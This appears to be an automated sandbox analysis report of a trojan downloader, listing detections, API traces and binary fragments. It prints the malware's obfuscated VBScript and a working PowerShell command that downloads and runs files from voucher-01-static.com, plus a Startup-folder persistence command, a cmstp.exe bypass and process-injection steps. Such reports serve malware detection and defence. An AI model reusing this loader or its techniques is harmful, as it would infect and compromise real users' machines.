âââââââââââââââââââ âââ ââââ âââ ââââââ âââ âââ ââââââââââ âââââââ âââ âââ âââ ââââââ ââââââ + Registrations disabled ââââââ + Add Latest update ââââââ + Add History Version ââââââ ââââââ âââ âââ âââââââ âââ âââââââââââââ ââââââââ
Data received	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 09:25:21 GMT Content-Type: application/octet-stream Content-Length: 9771 Last-Modified: Sat, 08 Jun 2024 11:31:46 GMT Connection: keep-alive ETag: "66644122-262b" Accept-Ranges: bytes <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <script language="VBScript"> Function FKyzoRjK(ByVal BbWtNUf) FKyzoRjK = VarType(BbWtNUf) End Function Function xQKCKj(ByVal YXuvwQf) Dim BbWtNUf Dim vPFkEnK Dim kXPyZazea Dim PpnyQhK PpnyQhK = 82 BbWtNUf = FKyzoRjK(YXuvwQf) If BbWtNUf = 8204 Then For Each vPFkEnK In YXuvwQf kXPyZazea = kXPyZazea & Chr(vPFkEnK - PpnyQhK) Next Else kXPyZazea = Chr(YXuvwQf - PpnyQhK) End If xQKCKj = kXPyZazea End Function Function lpDIMQ(ByVal svdrzl) Set lpDIMQ = CreateObject(svdrzl) End Function Function BzspHQQRh(ByVal shqoB, ByVal gTeLPKuc, ByVal tjIuHA) Dim svdrzl Dim bpFqOta svdrzl = xQKCKj(Array(169,165,181,196,187,194,198,128,165,186,183,190,190)) Set bpFqOta = lpDIMQ(svdrzl) Call bpFqOta.Run(shqoB, gTeLPKuc, tjIuHA) Set BzspHQQRh = Nothing End Function Function jjcyJeP(ByVal MOauoyN) Dim svdrzl Dim bpFqOta svdrzl = xQKCKj(Array(169,165,181,196,187,194,198,128,165,186,183,190,190)) Set bpFqOta = lpDIMQ(svdrzl) jjcyJeP = bpFqOta.ExpandEnvironmentStrings(MOauoyN) End Function Function sdGeUSwL(ByVal shqoB, ByVal guRbHOQ) Dim svdrzl Dim fCtvMe Dim jaCLwWl svdrzl = xQKCKj(Array(165,181,196,187,194,198,187,192,185,128,152,187,190,183,165,203,197,198,183,191,161,180,188,183,181,198)) Set fCtvMe = lpDIMQ(svdrzl) Set jaCLwWl = fCtvMe.CreateTextFile(shqoB,True) jaCLwWl.Write guRbHOQ jaCLwWl.Close Set sdGeUSwL = Nothing End Function Function nBUECyHVD() Dim YXuvwQf Dim qrLyWO YXuvwQf = Array(118,151,196,196,193,196,147,181,198,187,193,192,162,196,183,184,183,196,183,192,181,183,114,143,114,130,95,92,118,197,114,143,114,160,183,201,127,161,180,188,183,181,198,114,150,187,179,185,192,193,197,198,187,181,197,128,162,196,193,181,183,197,197,165,198,179,196,198,155,192,184,193,114,181,191,197,198,194,128,183,202,183,95,92,118,197,128,147,196,185,199,191,183,192,198,197,114,143,114,121,149,140,174,167,197,183,196,197,174,162,199,180,190,187,181,174,199,197,183,196,128,187,192,184,114,129,179,199,121,95,92,118,197,128,167,197,183,165,186,183,190,190,151,202,183,181,199,198,183,114,143,114,118,152,179,190,197,183,95,92,173,150,187,179,185,192,193,197,198,187,181,197,128,162,196,193,181,183,197,197,175,140,140,165,198,179,196,198,122,118,197,123,95,92,118,198,114,143,114,118,162,165,165,181,196,187,194,198,164,193,193,198,114,125,114,121,174,121,114,125,114,118,159,203,155,192,200,193,181,179,198,187,193,192,128,159,203,149,193,191,191,179,192,182,128,160,179,191,183,95,92,184,199,192,18
Data received	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 09:25:22 GMT Content-Type: application/octet-stream Content-Length: 26624 Last-Modified: Fri, 17 May 2024 05:55:50 GMT Connection: keep-alive ETag: "6646f166-6800" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELõmìà0Rp @ À@»oOd $o8 H.textP R `.rsrcdT@@.reloc f@BïoHÀ?ô-´mp0x~%-&~þ"s %(+~%-&~þ#s %(+~%-&~þ$s %(+(+ +"( "( 0r}( rp À( s ( ~%-&~þ's %(+(+(" o# B($ o% &0r{- ( +{( }{rWp{(& o' { o( {repo' {{ (0`( þ ,+M{{o(+{oo' { oo( { (ú( }{{ ({rWp{(& o' 0Yþ,:s* rgpo+ o, o- }o- (. (+ +(. (+ +0 +03s( }{o/ o0 þ)s1 o2 03s }{o/ o0 þ+s3 o4 0+,{þ+ ,{o5 (6 0bs7 }s8 }s8 }s9 } s9 } s: }s7 }s; } s: }{o< {o< (= {#s> o? {rÑpo@ {wsA oB {oC {rápo' {oD {þsE oF {Ws> o? {rïpo@ { æsA oB {oG {oH {oI { !Ws> o? {rpo@ { 4 æsA oB {oG {oH {oI { s> o? { rOpo@ { Ì>sA oB { oC { Cs> o? { r[po@ { I sA oB { oC { oJ {oK { «Gs> o? {rupo@ { sA oB {oC {rpo' {s> o? {rpo@ {wsA oB {oC {r¹po' {oD {þsE oF { =s> o? { rÕpo@ { WsA oB { oC {rp"A îsL oM {i=s> o? {r+po@ {)sA oB { oC {rKpo' { oN "À@"PAsO (P (Q j ×sA (R (/ {oS (/ {
Data received	oS (/ {oS (/ {oS (/ { oS (/ { oS (/ {oS (/ {oS (/ {oS rSp(@ repo' þsE (T {oU {oU (V (W V(X (Y s&0B s, }Mþ ,(Z }M+0+(Z }MXi2Ü{M( +5s\ {Miþ,+{Mo] Xþ -Ýr¡po] r$p-r`p+rzp(& o] rpo] o^ + (_ o] (` -ãÞ þ o5 Ürpo] repo] 9s- }O }N8À {O{M {NYrep(a 9 þ.sb ( +þ,c {O{M {No] {N X}N {O{M {Nrep(d -«repo] {N X}N {N {O{M( +þ:ÿÿÿ8ûs/}Q}P8º{Q{M{PYrep(a ,~þ0sb ( +,c{Q{M{Po] {PX}P{Q{M{Prep(d -«repo] {PX}P{P{Q{M( +þ:#ÿÿÿ+ç!0» 5%rÖp¢%rüp¢se (sf -r8p+rRp og rnpoh ,8: og oh 9rep}rep} rep}!rep}"rep}#rep}$rep}%rep}&rep}'rep}(rep})rep}*rep}+Xþ 9 og 4% oi iþ,
Data received	¿Ø¬ÚÍÍ)½N$ça t]ußIEND®B`D 3hüü4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°\StringFileInfo8000004b0Comments"CompanyName4FileDescriptionErlnb0FileVersion1.0.0.04 InternalNameErlnb.exeHLegalCopyrightCopyright © 2024*LegalTrademarks< OriginalFilenameErlnb.exe,ProductNameErlnb4ProductVersion1.0.0.08Assembly Version1.0.0.0têï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>p0

Poweshell is sending data to a remote host (3 events)

Data sent	GET /kvro/1337x.txt HTTP/1.1 Host: voucher-01-static.com Connection: Keep-Alive
Data sent	GET /kvro/xplayd.hta HTTP/1.1 Host: voucher-01-static.com
Data sent	GET /kvro/Erlnb.exe HTTP/1.1 Host: voucher-01-static.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 8, 2024, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 8, 2024, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 8, 2024, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 8, 2024, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 8, 2024, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jdaqmeqs.cmdline"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2760 region_size: 688128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000450	1	0	0

Attempts to identify installed AV products by installation directory (9 events)

file	C:\Program Files\AVAST Software\Avast\avastUI.exe
file	C:\Program Files (x86)\AVAST Software\Avast\avastUI.exe
file	C:\Program Files\Kaspersky Lab
file	C:\Program Files (x86)\Kaspersky Lab
file	C:\Program Files\McAfee\Agent
file	C:\Program Files\Trend Micro
file	C:\Program Files (x86)\Trend Micro
file	C:\Program Files\AVG\Antivirus\AVGUI.exe
file	C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Roaming\1337x.txt
file	C:\Users\test22\AppData\Roaming\xplayd.hta
file	C:\Users\test22\AppData\Roaming\Erlnb.exe

Executes one or more WMI queries (1 event)

wmi	SELECT * FROM AntiVirusProduct

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELxÿ à0 ¦+ @ @ @T+O@ d` 8+ H.text `.rsrcd@ @@.reloc` @B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: P8hd@ ÔÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyNameFileDescription0FileVersion1.0.0.08InternalNameAcjvtmu.exe&LegalCopyrightLegalTrademarks@OriginalFilenameAcjvtmu.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0tC êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x004a4000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: ¨; base_address: 0x004a6000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2760 process_handle: 0x00000450	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELxÿ à0 ¦+ @ @ @T+O@ d` 8+ H.text `.rsrcd@ @@.reloc` @B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000450	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send July 8, 2024, 6:25 p.m.	buffer: GET /kvro/1337x.txt HTTP/1.1 Host: voucher-01-static.com Connection: Keep-Alive socket: 1436 sent: 85	1	85
send July 8, 2024, 6:25 p.m.	buffer: GET /kvro/xplayd.hta HTTP/1.1 Host: voucher-01-static.com socket: 1436 sent: 62	1	62
send July 8, 2024, 6:25 p.m.	buffer: GET /kvro/Erlnb.exe HTTP/1.1 Host: voucher-01-static.com socket: 1436 sent: 61	1	61

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv July 8, 2024, 6:25 p.m.	buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 08 Jul 2024 09:25:22 GMT Content-Type: application/octet-stream Content-Length: 26624 Last-Modified: Fri, 17 May 2024 05:55:50 GMT Connection: keep-alive ETag: "6646f166-6800" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELõmìà0Rp @ À@»oOd $o8 H.textP R `.rsrcdT@@.reloc f@BïoHÀ?ô-´mp0x~%-&~þ"s %(+~%-&~þ#s %(+~%-&~þ$s %(+(+ +"( "( 0r}( rp À( s ( ~%-&~þ's %(+(+(" o# B($ o% &0r{- ( +{( }{rWp{(& o' { o( {repo' {{ (0`( þ ,+M{{o(+{oo' { oo( { (ú( }{{ ({rWp{(& o' 0Yþ,:s* rgpo+ o, o- }o- (. (+ +(. (+ +0 +03s( }{o/ o0 þ)s1 o2 03s }{o/ o0 þ+s3 o4 0+,{þ+ ,{o5 (6 0bs7 }s8 }s8 }s9 } s9 } s: }s7 }s; } s: }{o< {o< (= {#s> o? {rÑpo@ {wsA oB {oC {rápo' {oD {þsE oF {Ws> o? {rïpo@ { æsA oB {oG {oH {oI { !Ws> o? {rpo@ { 4 æsA oB {oG {oH {oI { s> o? { rOpo@ { Ì>sA oB { oC { Cs> o? { r[po@ { I sA oB { oC { oJ {oK { «Gs> o? {rupo@ { sA oB {oC {rpo' {s> o? {rpo@ {wsA oB {oC {r¹po' {oD {þsE oF { =s> o? { rÕpo@ { WsA oB { oC {rp"A îsL oM {i=s> o? {r+po@ {)sA oB { oC {rKpo' { oN "À@"PAsO (P (Q j ×sA (R (/ {oS (/ { received: 2920 socket: 1436	1	2920	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 604 called NtSetContextThread to modify thread in remote process 2760
NtSetContextThread July 8, 2024, 6:25 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4205478 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000448 process_identifier: 2760	1	0	0

One or more non-whitelisted processes were created (8 events)

parent_process	powershell.exe	martian_process	"cmstp.exe" C:\Users\Public\user.inf /au
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jdaqmeqs.cmdline"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\1337x.txt
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\Erlnb.exe
parent_process	powershell.exe	martian_process	"C:\Windows\SysWOW64\mshta.exe" "C:\Users\test22\AppData\Roaming\xplayd.hta"
parent_process	powershell.exe	martian_process	"C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\1337x.txt
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\xplayd.hta
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\Erlnb.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 604 resumed a thread in remote process 2760
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2760	1	0	0

Creates a suspicious Powershell process (5 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Skyhigh	VBS/Downloader.acl
ALYac	VB:Trojan.Valyria.6886
VIPRE	VB:Trojan.Valyria.6886
Arcabit	VB:Trojan.Valyria.D1AE6
Symantec	Scr.Malscript!gen11
ESET-NOD32	VBS/TrojanDownloader.Agent.XAO
McAfee	VBS/Downloader.acl
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.6886
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.6886
Emsisoft	VB:Trojan.Valyria.6886 (B)
DrWeb	Trojan.DownLoader47.3897
FireEye	VB:Trojan.Valyria.6886
Ikarus	Trojan-Downloader.VBS.Agent
Jiangmin	Trojan.Script.amhb
Google	Detected
GData	VB:Trojan.Valyria.6886
Varist	VBS/Agent.APR!Eldorado
MAX	malware (ai score=80)
Fortinet	VBS/Agent.UQJ!tr
AVG	Script:SNH-gen [Drp]

Executed a process and injected code into it, probably while unpacking (50 out of 55 events)

Time & API	Arguments	Status	Return
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 2560	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2652 thread_handle: 0x00000318 process_identifier: 2648 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000324	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000354 suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000580 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000354 suspend_count: 1 process_identifier: 2648	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2848 thread_handle: 0x0000054c process_identifier: 2844 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\notepad.exe track: 1 command_line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\1337x.txt filepath_r: C:\Windows\system32\NOTEPAD.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000498	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000003e8 suspend_count: 1 process_identifier: 2648	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2928 thread_handle: 0x000005e4 process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\mshta.exe track: 1 command_line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\test22\AppData\Roaming\xplayd.hta" filepath_r: C:\Windows\SysWOW64\mshta.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005d8	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000005c4 suspend_count: 1 process_identifier: 2648	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 812 thread_handle: 0x000003dc process_identifier: 604 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Erlnb.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Erlnb.exe" filepath_r: C:\Users\test22\AppData\Roaming\Erlnb.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005f8	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000624 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2844	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000108 suspend_count: 1 process_identifier: 2924	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 3008 thread_handle: 0x00000320 process_identifier: 3004 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000032c	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000320 suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 3004	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 3004	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000458 suspend_count: 1 process_identifier: 3004	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 196 thread_handle: 0x000004e0 process_identifier: 152 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmstp.exe" C:\Users\Public\user.inf /au filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000004dc	1	1
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2232 thread_handle: 0x000003c0 process_identifier: 2228 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jdaqmeqs.cmdline" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000003c4	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000003a4 suspend_count: 1 process_identifier: 3004	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x0000035c suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 604	1	0
NtGetContextThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000398 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000003f0 suspend_count: 1 process_identifier: 604	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2540 thread_handle: 0x00000440 process_identifier: 2544 current_directory: C:\Users\test22\AppData\Roaming filepath: track: 1 command_line: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\test22\AppData\Roaming\Erlnb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Erlnb.exe' -Force filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000444	1	1
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2756 thread_handle: 0x00000448 process_identifier: 2760 current_directory: filepath: C:\Users\test22\AppData\Roaming\Erlnb.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\Erlnb.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000450	1	1
NtGetContextThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000448	1	0
NtAllocateVirtualMemory July 8, 2024, 6:25 p.m.	process_identifier: 2760 region_size: 688128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000450	1	0
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELxÿ à0 ¦+ @ @ @T+O@ d` 8+ H.text `.rsrcd@ @@.reloc` @B base_address: 0x00400000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: base_address: 0x00402000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: P8hd@ ÔÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyNameFileDescription0FileVersion1.0.0.08InternalNameAcjvtmu.exe&LegalCopyrightLegalTrademarks@OriginalFilenameAcjvtmu.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0tC êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x004a4000 process_identifier: 2760 process_handle: 0x00000450	1	1
